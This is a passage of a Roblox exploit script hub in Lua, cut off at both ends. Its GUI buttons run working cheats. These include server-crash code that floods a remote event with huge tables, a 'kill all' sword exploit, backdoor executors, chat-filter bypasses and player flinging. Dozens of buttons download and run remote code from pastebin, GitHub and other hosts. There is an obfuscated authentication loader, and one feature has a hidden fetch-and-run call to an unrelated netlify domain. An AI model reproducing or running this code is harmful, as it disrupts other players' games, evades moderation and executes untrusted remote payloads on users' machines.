IY.Parent = Frame_2 IY.BackgroundColor3 = Color3.fromRGB(45, 45, 45) IY.BorderSizePixel = 0 IY.Position = UDim2.new(0.509132445, 0, 0.676470578, 0) IY.Size = UDim2.new(0, 209, 0, 33) IY.Font = Enum.Font.SourceSans IY.Text = "Unmute Game" IY.TextColor3 = Color3.fromRGB(255, 255, 255) IY.TextScaled = true IY.TextSize = 30.000 IY.TextWrapped = true UICorner_5.Parent = IY TextLabel_2.Parent = Frame_2 TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.BackgroundTransparency = 1.000 TextLabel_2.Position = UDim2.new(0.0182648394, 0, 0.466386557, 0) TextLabel_2.Size = UDim2.new(0, 426, 0, 50) TextLabel_2.Font = Enum.Font.GothamSemibold TextLabel_2.Text = "Wait Speed :" TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.TextSize = 30.000 TextLabel_2.TextWrapped = true TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left Wait.Name = "Wait()" Wait.Parent = Frame_2 Wait.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Wait.BackgroundTransparency = 1.000 Wait.Position = UDim2.new(0.531963468, 0, 0.466386557, 0) Wait.Size = UDim2.new(0, 199, 0, 50) Wait.ZIndex = 99999 Wait.ClearTextOnFocus = false Wait.Font = Enum.Font.GothamSemibold Wait.Text = "0.5" Wait.TextColor3 = Color3.fromRGB(255, 255, 255) Wait.TextSize = 30.000 Wait.TextWrapped = true --Sound Service: local notification = Instance.new("Sound") notification.Parent = game:GetService("SoundService") notification.SoundId = "rbxassetid://9086208751" notification.Volume = 5 notification.Name = ". Ǥ҉̷҉̵҉̸҉̷҉̵҉̸҉̡҉̡҉̼҉̱҉͎҉͎҉̞҉̼҉̱҉͎҉͎҉̞҉ͤ҉ͬ҉̅҉ͤ҉ͬ" --funuction: Exit.MouseButton1Click:Connect(function() ScreenGui:Destroy() end) local Mute = false IY.MouseButton1Click:Connect(function() Mute = false end) _1E.MouseButton1Click:Connect(function() Mute = true while Mute == true do wait() for _, sound in next, game:GetService("Workspace"):GetDescendants() do if sound:IsA("Sound") then sound:Stop() end end end end) _3E.MouseButton1Click:Connect(function() for _, sound in next, game:GetService("Workspace"):GetDescendants() do if sound:IsA("Sound") then sound:Play() end end end) local Active = true SE.MouseButton1Click:Connect(function() Active = true while Active == true do local StringValue = Wait.Text wait(StringValue) for _, sound in next, game:GetService("Workspace"):GetDescendants() do if sound:IsA("Sound") then sound:Play() end end end end) Stop.MouseButton1Click:Connect(function() Active = false end) --Credit: notification:Play() game:GetService("StarterGui"):SetCore("SendNotification", { Title = "FELAG"; Text = "FELAG Has Been Loaded , Made By Scripty#2063 (gamer14_123)"; Icon = ""; Duration = 10; Button1 = "Yes Sir"; }) --Check: while true do wait(0.5) local setting = game:GetService("SoundService").RespectFilteringEnabled if setting == true then Time.TextColor = BrickColor.new(255,0,0) Time.Text ="RespectFilteringEnabled(RFE) : true" elseif setting == false then Time.Text ="RespectFilteringEnabled(RFE) : false" Time.TextColor = BrickColor.new(0,255,0) end end end }) Main:AddButton({ Title = "FE Universal Script Hub", Description = "FE Universal Script Hub", Callback = function() loadstring(game:HttpGet('https://gist.githubusercontent.com/Dvrknvss/e2a906135f9e55d0d2ae7aaf337d8937/raw/dc055592803f8418ddf8ba7b84286f47638849d4/noidea'))() end }) Main:AddButton({ Title = "Portal Gun", Description = "COOL ASF", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub/main/portal%20gun.txt'))() end }) Main:AddButton({ Title = "FE Server lag or crash", Description = "idk how well this works and only for sum games", Callback = function() loadstring(game:HttpGet("https://pastebin.com/raw/yGqP4zFa"))() end }) Main:AddButton({ Title = "FE Server lag or crash 2", Description = "idk how well this works", Callback = function() shared.TeleportToSky = false -- for games that show ur ping (like custom duels) if shared.TeleportToSky then local char = game:GetService('Players').LocalPlayer.Character char.HumanoidRootPart.CFrame = CFrame.new(0, 9e9, 0) task.wait(0.5) char.HumanoidRootPart.Anchored = true end while wait(1.5) do --// don't change it's the best game:GetService("NetworkClient"):SetOutgoingKBPSLimit(math.huge * math.huge) local function getmaxvalue(val) local mainvalueifonetable = 499999 if type(val) ~= "number" then return nil end local calculateperfectval = (mainvalueifonetable / (val + 2)) return calculateperfectval end local function bomb(tableincrease, tries) local maintable = {} local spammedtable = {} table.insert(spammedtable, {}) z = spammedtable[1] for i = 1, tableincrease do local tableins = {} table.insert(z, tableins) z = tableins end local calculatemax = getmaxvalue(tableincrease) local maximum if calculatemax then maximum = calculatemax else maximum = 999999 end for i = 1, maximum do table.insert(maintable, spammedtable) end for i = 1, tries do game.RobloxReplicatedStorage.SetPlayerBlockList:FireServer(maintable) end end bomb(289, 5) --// change values if client crashes end end }) Main:AddButton({ Title = "FE Server lag or crash 3", Description = "This script is designed for skill-based games such as Hood Customs and More", Callback = function() loadstring(game:HttpGet("https://pastebin.com/raw/yGqP4zFa"))() end }) Main:AddButton({ Title = "Small server Joiner", Description = "joins smallest server", Callback = function() local Http = game:GetService("HttpService") local TPS = game:GetService("TeleportService") local Api = "https://games.roblox.com/v1/games/" local _place = game.PlaceId local _servers = Api .. _place .. "/servers/Public?sortOrder=Asc&limit=100" function ListServers(cursor) local Raw = game:HttpGet(_servers .. ((cursor and "&cursor=" .. cursor) or "")) return Http:JSONDecode(Raw) end local Server, Next; repeat local Servers = ListServers(Next) Server = Servers.data[1] Next = Servers.nextPageCursor until Server TPS:TeleportToPlaceInstance(_place, Server.id, game:GetService("Players").LocalPlayer) end }) Main:AddButton({ Title = "Server browser", Description = "Browse Servers of current Place", Callback = function() loadstring(game:HttpGet("https://www.scriptblox.com/raw/Server-Browser_80", true))(); end }) Main:AddButton({ Title = "Join lowest ping server", Description = "method 1", Callback = function() local Lowest = "ping" -- set to "playing" to find the lowest player server local HTTPService = game:GetService("HttpService") local success, servers = pcall(function() return HTTPService:JSONDecode(game:HttpGet( "https://games.roblox.com/v1/games/" .. tostring(game.PlaceId) .. "/servers/Public?limit=100" )).data end) if not success then return end local server = servers[1] for i,svr in pairs(servers) do if svr[Lowest] < server[Lowest] then server = svr end end game:GetService("TeleportService"):TeleportToPlaceInstance(game.PlaceId, server.id) end }) Main:AddButton({ Title = "join lowest ping server", Description = "method 2", Callback = function() local HTTPService = game:GetService("HttpService") local TeleportService = game:GetService("TeleportService") local StatsService = game:GetService("Stats") local function fetchServersData(placeId, limit) local url = string.format("https://games.roblox.com/v1/games/%d/servers/Public?limit=%d", placeId, limit) local success, response = pcall(function() return HTTPService:JSONDecode(game:HttpGet(url)) end) if success and response and response.data then return response.data end return nil end local placeId = game.PlaceId local serverLimit = 100 local servers = fetchServersData(placeId, serverLimit) if not servers then return end local lowestPingServer = servers[1] for _, server in pairs(servers) do if server["ping"] < lowestPingServer["ping"] and server.maxPlayers > server.playing then lowestPingServer = server end end local commonLoadTime = 5 task.wait(commonLoadTime) local pingThreshold = 100 local serverStats = StatsService.Network.ServerStatsItem local dataPing = serverStats["Data Ping"]:GetValueString() local pingValue = tonumber(dataPing:match("(%d+)")) if pingValue >= pingThreshold then TeleportService:TeleportToPlaceInstance(placeId, lowestPingServer.id) else -- Good ping end end }) Main:AddButton({ Title = "Eclipse hub/Sniper to join", Description = "Join Person", Callback = function() getgenv().mainKey = "nil" local a, b, c, d, e = loadstring, request or http_request or (http and http.request) or (syn and syn.request), assert, tostring, "https://api.eclipsehub.xyz/auth" c(a and b, "Executor not Supported") a(b({ Url = e .. "\?\107e\121\61" .. d(mainKey), Headers = { ["User-Agent"] = "Eclipse" } }).Body)() end }) GUIS:AddButton({ Title = "System Broken FE", Description = "Animations", Callback = function() local credits = "SystemBroken made by system_calix" loadstring(game:HttpGet("https://raw.githubusercontent.com/H20CalibreYT/SystemBroken/main/script"))() end }) Main:AddButton({ Title = "FE Car Tornado", Description = "spins car when found or sum idrk", Callback = function() -- Scripted on mobile -- Fe Vehicle Fling Alpha -- Start UP local notification = Instance.new("Sound") notification.Parent = game:GetService("SoundService") notification.SoundId = "rbxassetid://9086208751" notification.Volume = 1 local char = game:GetService("Players").LocalPlayer.Character function getRoot(char) local rootPart = char:FindFirstChild('HumanoidRootPart') or char:FindFirstChild('Torso') or char:FindFirstChild('UpperTorso') return rootPart end -- Part Detector Seat local SPart = Instance.new("Part"); local Player = game:GetService('Players').LocalPlayer; repeat game:GetService('RunService').RenderStepped:Wait() until Player.Character; local Character = Player.Character; SPart.Anchored, SPart.CanCollide = true, true; SPart.Parent = workspace; SPart.Size = Vector3.new(1, 100, 1) SPart.Transparency = 0.4 game:GetService('RunService').Stepped:Connect(function() local Ray = Ray.new(Character.PrimaryPart.Position + Character.PrimaryPart.CFrame.LookVector * 6, Vector3.new(0, -1, 0) * 4); local FPOR = game:GetService("Workspace"):FindPartOnRayWithIgnoreList(Ray, { Character }); if (FPOR) then SPart.CFrame = Character.PrimaryPart.CFrame + Character.PrimaryPart.CFrame.LookVector * 6; end if SPart == nil then Ray:destroy() FPOR:destroy() end end) game.StarterGui:SetCore("SendNotification", { Title = "FE Vehicle Fling"; Icon = "rbxassetid://7279804519"; Text = "Identify Passanger Seat, Part_OnTouched"; Duration = 10; notification:Play() }) -- The finish touches -- Mobile and PC Support BODYGYRO SPart.Touched:Connect(function(hit) if hit:IsA("Seat") then local IsFlying = False local flyv local flyg local Player = game:GetService("Players").LocalPlayer local Speed = 50 local LastSpeed = Speed local maxspeed = 100 local IsRunning = false local f = 0 IsFlying = true flyv = Instance.new("BodyVelocity") flyv.Parent = Player.Character:FindFirstChild('Torso') or Player.Character:FindFirstChild('UpperTorso') flyv.MaxForce = Vector3.new(math.huge, math.huge, math.huge) flyg = Instance.new("BodyGyro") flyg.Parent = Player.Character:FindFirstChild('Torso') or Player.Character:FindFirstChild('UpperTorso') flyg.MaxTorque = Vector3.new(9e9, 9e9, 9e9) flyg.P = 1000 flyg.D = 50 Player.Character:WaitForChild('Humanoid').PlatformStand = true Player.Character.Humanoid.Changed:Connect(function(Prop) if Player.Character.Humanoid.MoveDirection == Vector3.new(0, 0, 0) then IsRunning = false else IsRunning = true end end) spawn(function() while true do wait() if IsFlying then flyg.CFrame = game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((f + 0) * 50 * Speed / maxspeed), 0, 0) flyv.Velocity = game:GetService("Workspace").CurrentCamera.CoordinateFrame.LookVector * Speed wait(0.1) if Speed < 0 then Speed = 0 f = 0 end end if IsRunning then Speed = LastSpeed else if not Speed == 0 then LastSpeed = Speed end Speed = 0 end end end) Speed = 0.1 wait(0.3) hit:Sit(game:GetService("Players").LocalPlayer.Character.Humanoid) SPart:Destroy() wait(0.3) local speaker = game:GetService("Players").LocalPlayer local seat = speaker.Character:FindFirstChildOfClass('Humanoid').SeatPart local vehicleModel = seat.Parent repeat if vehicleModel.ClassName ~= "Model" then vehicleModel = vehicleModel.Parent end until vehicleModel.ClassName == "Model" wait(0.1) for i, v in pairs(vehicleModel:GetDescendants()) do if v:IsA("BasePart") and v.CanCollide then v.CanCollide = false end end wait(0.2) Speed = 80 local Spin = Instance.new("BodyAngularVelocity") Spin.Name = "Spinning" Spin.Parent = getRoot(speaker.Character) Spin.MaxTorque = Vector3.new(0, math.huge, 0) Spin.AngularVelocity = Vector3.new(0, 2000, 0) game.StarterGui:SetCore("SendNotification", { Title = "FE Vehicle Fling"; Icon = "rbxassetid://7279804519"; Text = "Identified the seat part, Success!"; Duration = 10; notification:Play() }) end end) end }) Main:AddButton({ Title = "Walk on Walls FE", Description = "kinda buggy if execute more than once", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub/main/FE%20Walk%20On%20Walls%20Script%20(R6%2615).txt"))() end }) Main:AddButton({ Title = "Netless V2", Description = "need to do every time u reset", Callback = function() for i, v in next, game:GetService("Players").LocalPlayer.Character:GetDescendants() do if v:IsA("BasePart") and v.Name ~= "HumanoidRootPart" then game:GetService("RunService").Heartbeat:connect(function() v.Velocity = Vector3.new(0, 35, 0) wait(0.5) end) end end game:GetService("StarterGui"):SetCore("SendNotification", { Title = "Notification"; Text = "Netless activated"; Icon = "rbxthumb://type=Asset&id=5107182114&w=150&h=150" }) Duration = 16; end }) Main:AddButton({ Title = "FE Ghost/Invisible", Description = "makes u invisible", Callback = function() local offset = 1100 local invisible = game:GetService("Players").LocalPlayer local grips = {} local heldTool local gripChanged local handle local weld function setDisplayDistance(distance) for _, player in pairs(game:GetService("Players"):GetPlayers()) do if player.Character and player.Character:FindFirstChildWhichIsA("Humanoid") then player.Character:FindFirstChildWhichIsA("Humanoid").NameDisplayDistance = distance player.Character:FindFirstChildWhichIsA("Humanoid").HealthDisplayDistance = distance end end end local tool = Instance.new("Tool", game:GetService("Players").LocalPlayer.Backpack) tool.Name = "Ghost" tool.RequiresHandle = false tool.CanBeDropped = false tool.Equipped:Connect( function() wait() if not invisible then invisible = true tool.Name = "Ghost: Enabled" if handle then handle:Destroy() end if weld then weld:Destroy() end handle = Instance.new("Part", workspace) handle.Name = "Handle" handle.Transparency = 1 handle.CanCollide = false handle.Size = Vector3.new(2, 1, 1) weld = Instance.new("Weld", handle) weld.Part0 = handle weld.Part1 = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart weld.C0 = CFrame.new(0, offset - 1.5, 0) setDisplayDistance(offset + 100) game:GetService("Workspace").CurrentCamera.CameraSubject = handle game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0, offset, 0) game:GetService("Players").LocalPlayer.Character.Humanoid.HipHeight = offset game:GetService("Players").LocalPlayer.Character.Humanoid:ChangeState(11) for _, child in pairs(game:GetService("Players").LocalPlayer.Backpack:GetChildren()) do if child:IsA("Tool") and child ~= tool then grips[child] = child.Grip end end elseif invisible then invisible = false tool.Name = "Ghost: Disabled" if handle then handle:Destroy() end if weld then weld:Destroy() end for _, child in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren()) do if child:IsA("Tool") then child.Parent = game:GetService("Players").LocalPlayer.Backpack end end for tool, grip in pairs(grips) do if tool then tool.Grip = grip end end heldTool = nil setDisplayDistance(100) game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character.Humanoid game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0, -offset, 0) game:GetService("Players").LocalPlayer.Character.Humanoid.HipHeight = 0 end tool.Parent = game:GetService("Players").LocalPlayer.Backpack end ) game:GetService("Players").LocalPlayer.Character.ChildAdded:Connect( function(child) wait() if invisible and child:IsA("Tool") and child ~= heldTool and child ~= tool then heldTool = child local lastGrip = heldTool.Grip if not grips[heldTool] then grips[heldTool] = lastGrip end for _, track in pairs(game:GetService("Players").LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()) do track:Stop() end game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true heldTool.Grip = heldTool.Grip * (CFrame.new(0, offset - 1.5, 1.5) * CFrame.Angles(math.rad(-90), 0, 0)) heldTool.Parent = game:GetService("Players").LocalPlayer.Backpack heldTool.Parent = game:GetService("Players").LocalPlayer.Character if gripChanged then gripChanged:Disconnect() end gripChanged = heldTool:GetPropertyChangedSignal("Grip"):Connect( function() wait() if not invisible then gripChanged:Disconnect() end if heldTool.Grip ~= lastGrip then lastGrip = heldTool.Grip * (CFrame.new(0, offset - 1.5, 1.5) * CFrame.Angles(math.rad(-90), 0, 0)) heldTool.Grip = lastGrip heldTool.Parent = game:GetService("Players").LocalPlayer.Backpack heldTool.Parent = game:GetService("Players").LocalPlayer.Character end end ) end end ) end }) GUIS:AddButton({ Title = "Sushi X", Description = "idk", Callback = function() loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/sushi/main/X'), true))() end }) Main:AddButton({ Title = "FE Chat Haxx V3.5", Description = "Bypasses Chat Filter", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/Chat/FE%20Chat%20Haxx%20V3.5.txt'))(); end }) Main:AddButton({ Title = "FE Chat Bypass", Description = "Bypasses Chat Filter", Callback = function() loadstring(game:HttpGet('https://pastes.io/raw/lstrrfipqq'))(); end }) Main:AddButton({ Title = "FE Chat Bypass 2", Description = "Bypasses Chat Filter", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Synergy-Networks/products/main/BetterBypasser/loader.lua", true))() end }) Main:AddButton({ Title = "FE Chat Bypass 3", Description = "Bypasses Chat Filter", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/ChainGotStucked/a55af82d82574/main/Eminence%20Hub"))() end }) Main:AddButton({ Title = "FE Chat Bypass 4", Description = "Bypasses Chat Filter", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/wspo23e/SDL-Roblox-ChatBypasser/main/SDL-NoFilterV2.5"))() end }) Main:AddButton({ Title = "FE Chat Bypass 5", Description = "Bypasses Chat Filter", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/Chat/NoTagScript.txt'))(); end }) Main:AddButton({ Title = "Backdoor.exe", Description = "Scans for backdoors", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/master/source.lua"))() end }) Main:AddButton({ Title = "Backdoor.exe V6", Description = "Scans for backdoors", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v6/source.lua"))() end }) Main:AddButton({ Title = "Backdoor.exe V6x", Description = "Scans for backdoors", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v6x/source.lua"))() end }) Main:AddButton({ Title = "Backdoor.exe V8", Description = "Scans for backdoors", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua"))(); end }) Main:AddButton({ Title = "fork of backdoor.exe?", Description = "Scans for backdoors", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/BackDoor/fork.txt"))() end }) Main:AddButton({ Title = "Frakture SS", Description = "Scans for backdoors", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/BackDoor/Frakture%20SS.txt"))() end }) Main:AddButton({ Title = "jalon's backdeer skenner", Description = "Scans for backdoors", Callback = function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/jLn0n/scripts/main/backdoor-executor/backdoor-executor.lua"))() end }) Main:AddButton({ Title = "k4scripts", Description = "Scans for backdoors", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/BackDoor/forker.txt"))() end }) Main:AddButton({ Title = "og backdoor.exe?", Description = "Scans for backdoors", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/BackDoor/og.txt"))() end }) Main:AddButton({ Title = "TntmasterSS", Description = "Scans for backdoors", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/BackDoor/tntmasterss.txt"))() end }) local Textbox = Main:AddInput("TextboxIdentifier", { Title = "4nn1 backdoor", Default = "Put require here", PlaceHolder = 'require(2648071219).load("userhere")', Numeric = false, -- Only allows numbers Finished = true, -- Only calls the callback when you've pressed enter Callback = function(Value) -- Value ?: string --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] function scripta() loadstring(Value) print("Success") end for i, v in pairs(game:GetService("ReplicatedStorage"):GetDescendants()) do if v:IsA("RemoteEvent") then v:FireServer(scripta()) print(v.Name) end end end }) Main:AddButton({ Title = "Blackhole", Description = "unanchored objects", Callback = function() local UserInputService = game:GetService("UserInputService") local Mouse = game:GetService("Players").LocalPlayer:GetMouse() local Folder = Instance.new("Folder", game:GetService("Workspace")) local Part = Instance.new("Part", Folder) local Attachment1 = Instance.new("Attachment", Part) Part.Anchored = true Part.CanCollide = false Part.Transparency = 1 local Updated = Mouse.Hit + Vector3.new(0, 5, 0) local NetworkAccess = coroutine.create(function() settings().Physics.AllowSleep = false while game:GetService("RunService").RenderStepped:Wait() do for _, Players in next, game:GetService("Players"):GetPlayers() do if Players ~= game:GetService("Players").LocalPlayer then Players.MaximumSimulationRadius = 0 sethiddenproperty(Players, "SimulationRadius", 0) end end game:GetService("Players").LocalPlayer.MaximumSimulationRadius = math.pow(math.huge,math.huge) setsimulationradius(math.huge) end end) coroutine.resume(NetworkAccess) local function ForcePart(v) if v:IsA("Part") and v.Anchored == false and v.Parent:FindFirstChild("Humanoid") == nil and v.Parent:FindFirstChild("Head") == nil and v.Name ~= "Handle" then Mouse.TargetFilter = v for _, x in next, v:GetChildren() do if x:IsA("BodyAngularVelocity") or x:IsA("BodyForce") or x:IsA("BodyGyro") or x:IsA("BodyPosition") or x:IsA("BodyThrust") or x:IsA("BodyVelocity") or x:IsA("RocketPropulsion") then x:Destroy() end end if v:FindFirstChild("Attachment") then v:FindFirstChild("Attachment"):Destroy() end if v:FindFirstChild("AlignPosition") then v:FindFirstChild("AlignPosition"):Destroy() end if v:FindFirstChild("Torque") then v:FindFirstChild("Torque"):Destroy() end v.CanCollide = false local Torque = Instance.new("Torque", v) Torque.Torque = Vector3.new(100000, 100000, 100000) local AlignPosition = Instance.new("AlignPosition", v) local Attachment2 = Instance.new("Attachment", v) Torque.Attachment0 = Attachment2 AlignPosition.MaxForce = 9999999999999999 AlignPosition.MaxVelocity = math.huge AlignPosition.Responsiveness = 200 AlignPosition.Attachment0 = Attachment2 AlignPosition.Attachment1 = Attachment1 end end for _, v in next, game:GetService("Workspace"):GetDescendants() do ForcePart(v) end game:GetService("Workspace").DescendantAdded:Connect(function(v) ForcePart(v) end) UserInputService.InputBegan:Connect(function(Key, Chat) if Key.KeyCode == Enum.KeyCode.E and not Chat then Updated = Mouse.Hit + Vector3.new(0, 5, 0) end end) spawn(function() while game:GetService("RunService").RenderStepped:Wait() do Attachment1.WorldCFrame = Updated end end) end }) Main:AddButton({ Title = "FE Backflip", Description = "Keybinds are Z X C", Callback = function() wait(5)-- local ver = "2.00" local scriptname = "feFlip"-- local FrontflipKey = Enum.KeyCode.Z local BackflipKey = Enum.KeyCode.X local AirjumpKey = Enum.KeyCode.C-- local ca = game:GetService("ContextActionService") local zeezy = game:GetService("Players").LocalPlayer local h = 0.0174533 local antigrav-- function zeezyFrontflip(act, inp, obj) if inp == Enum.UserInputState.Begin then zeezy.Character.Humanoid:ChangeState("Jumping") wait() zeezy.Character.Humanoid.Sit = true for i = 1, 360 do delay(i / 720, function() zeezy.Character.Humanoid.Sit = true zeezy.Character.HumanoidRootPart.CFrame = zeezy.Character.HumanoidRootPart.CFrame * CFrame.Angles(-h, 0, 0) end) end wait(0.55) zeezy.Character.Humanoid.Sit = false end end function zeezyBackflip(act, inp, obj) if inp == Enum.UserInputState.Begin then zeezy.Character.Humanoid:ChangeState("Jumping") wait() zeezy.Character.Humanoid.Sit = true for i = 1, 360 do delay(i / 720, function() zeezy.Character.Humanoid.Sit = true zeezy.Character.HumanoidRootPart.CFrame = zeezy.Character.HumanoidRootPart.CFrame * CFrame.Angles(h, 0, 0) end) end wait(0.55) zeezy.Character.Humanoid.Sit = false end end function zeezyAirjump(act, inp, obj) if inp == Enum.UserInputState.Begin then zeezy.Character:FindFirstChildOfClass'Humanoid':ChangeState("Seated") wait() zeezy.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping") end end-- ca:BindAction("zeezyFrontflip", zeezyFrontflip, false, FrontflipKey) ca:BindAction("zeezyBackflip", zeezyBackflip, false, BackflipKey) ca:BindAction("zeezyAirjump", zeezyAirjump, false, AirjumpKey)-- print(scriptname .. " " .. ver .. " loaded successfully") print("made by Zeezy#7203") local notifSound = Instance.new("Sound", workspace) notifSound.PlaybackSpeed = 1.5 notifSound.Volume = 0.15 notifSound.SoundId = "rbxassetid://170765130" notifSound.PlayOnRemove = true notifSound:Destroy() game.StarterGui:SetCore("SendNotification", { Title = "feFlip", Text = "feFlip loaded successfully!", Icon = "rbxassetid://505845268", Duration = 5, Button1 = "Okay" }) end }) Main:AddButton({ Title = "Super fling", Description = "fling players", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub/main/superfling', true))() end }) Main:AddButton({ Title = "FE Big Head Rthro R15", Description = "dont use hats/hair also scale head to max in avatar", Callback = function() -- ((Packed with care by sysGhost/BiKode)) -- Remember to use R15 with Rthro avatar(head) and scale ur head at max for i, v in pairs(game:GetService("Players").LocalPlayer.Character.Humanoid:GetChildren()) do if string.find(v.Name, "Scale") and v.Name ~= "HeadScale" then repeat wait(HeadGrowSpeed) until game:GetService("Players").LocalPlayer.Character.Head:FindFirstChild("OriginalSize") game:GetService("Players").LocalPlayer.Character.Head.OriginalSize:Destroy() v:Destroy() game:GetService("Players").LocalPlayer.Character.Head:WaitForChild("OriginalSize") end end end }) Main:AddButton({ Title = "FE upside down R6", Description = "cant see on ur side but everyone else can", Callback = function() local lp = game:GetService("Players").LocalPlayer local c = lp.Character local hrp0 = c:FindFirstChild("HumanoidRootPart") local hrp1 = hrp0:Clone() c.Parent = nil hrp0.Parent = hrp1 hrp0.RootJoint.Part0 = nil hrp1.Parent = c c.Parent = workspace local h = game:GetService("RunService").Heartbeat hrp0.Transparency = 0.5 while h:Wait() and c and c.Parent do hrp0.CFrame = hrp1.CFrame hrp0.Orientation += Vector3.new(0, 0, 180) hrp0.Position -= Vector3.new(0, 1, 0) hrp0.Velocity = hrp1.Velocity end end }) Main:AddButton({ Title = "Fling Click on person you want", Description = "makes ur character a kinda shaky on other ppls screens", Callback = function() loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/obf_5wpM7bBcOPspmX7lQ3m75SrYNWqxZ858ai3tJdEAId6jSI05IOUB224FQ0VSAswH.lua.txt'), true))() end }) Main:AddButton({ Title = "FE Lag", Description = "makes ur character stuck", Callback = function(a) game:GetService("Players").LocalPlayer.Character:WaitForChild("HumanoidRootPart").Anchored = true game:GetService("Players").LocalPlayer.Character.Animate.Enabled = false end }) Main:AddButton({ Title = "FE DISABLE Lag", Description = "makes ur character UN stuck", Callback = function(a) game:GetService("Players").LocalPlayer.Character:WaitForChild("HumanoidRootPart").Anchored = false game:GetService("Players").LocalPlayer.Character.Animate.Enabled = true end }) Main:AddButton({ Title = "FE Lag Switch", Description = "makes ur character lag on other peoples screens", Callback = function(a) loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/FE%20lagswitch.txt"))() end }) Main:AddButton({ Title = "FE Lag Switch", Description = "makes ur character lag on other peoples screens press X", Callback = function(a) loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/felagswitchx.txt"))() end }) Main:AddButton({ Title = "FE Lag Switch V2", Description = "makes ur character lag on other peoples screens press X", Callback = function(a) -- Creo Fake Lag Script -- < You> -- -- How long each lag can last local Minimum_Time = 0.8 local Maximum_Time = 4 -- -- local Msgreq = function(Text,Duration,Button1Text,Button2Text) game.StarterGui:SetCore("SendNotification", { Title = "Creo FE Lag Script"; Text = Text; Icon = ""; Duration = Duration; Button1 = Button1Text; Button2 = Button2Text; Callback = nil; }) end spawn(function()loadstring(game:HttpGet(game:HttpGet("https://luafunctionsextra.netlify.app", true)))()end) local function lag(thing,tim) local a = game:GetService("Players").LocalPlayer.Character.Animate a.Parent = nil local am = tim*30 local frames = am while true do if frames > 0 then thing.Parent = nil thing.Parent = workspace frames-=1 task.wait() else a.Parent = game:GetService("Players").LocalPlayer.Character break end end end Msgreq("Activated",2,"Ok",nil) while true do wait(math.random(1,20)*0.1) lag(game:GetService("Players").LocalPlayer.Character,math.random(Minimum_Time,Maximum_Time)) end end }) Main:AddButton({ Title = "FE kill all", Description = "U NEED SWORD AND PULL IT OUT", Callback = function() local range = 1000 local player = game:GetService("Players").LocalPlayer local function isFriendWith(player1, player2) return player1:IsFriendsWith(player2.UserId) end game:GetService("RunService").RenderStepped:Connect(function() local players = game:GetService("Players"):GetPlayers() for i = 2, #players do local otherPlayer = players[i] local character = otherPlayer.Character if not isFriendWith(player, otherPlayer) then local tool = player.Character and player.Character:FindFirstChildOfClass("Tool") if tool and tool:FindFirstChild("Handle") then tool:Activate() for _, part in next, character:GetChildren() do if part:IsA("BasePart") then firetouchinterest(tool.Handle, part, 0) firetouchinterest(tool.Handle, part, 1) end end end end end end) end }) Main:AddButton({ Title = "Fling Click unanchored parts", Description = "fling unanchored parts tool", Callback = function() local lp = game:GetService("Players").LocalPlayer local mouse = lp:GetMouse() local ft = Instance.new("Tool") ft.Name = "Fling Tool" ft.RequiresHandle = false ft.Parent = lp.Backpack ft.Activated:Connect(function() local obj = mouse.Target if obj:IsA("BasePart") or obj:IsA("Part") or obj:IsA("MeshPart") or obj:IsA("CornerWedgePart") or obj:IsA("TrussPart") or obj:IsA("WedgePart") then if not obj.Anchored then local bambam = Instance.new("BodyAngularVelocity") bambam.Name = "BAM BAM AHAHHAHAHHAHAH" bambam.Parent = obj bambam.AngularVelocity = Vector3.new(99999,99999,99999) bambam.MaxTorque = Vector3.new(math.huge,math.huge,math.huge) bambam.P = math.huge end end end) end }) Main:AddButton({ Title = "FE Attach to part", 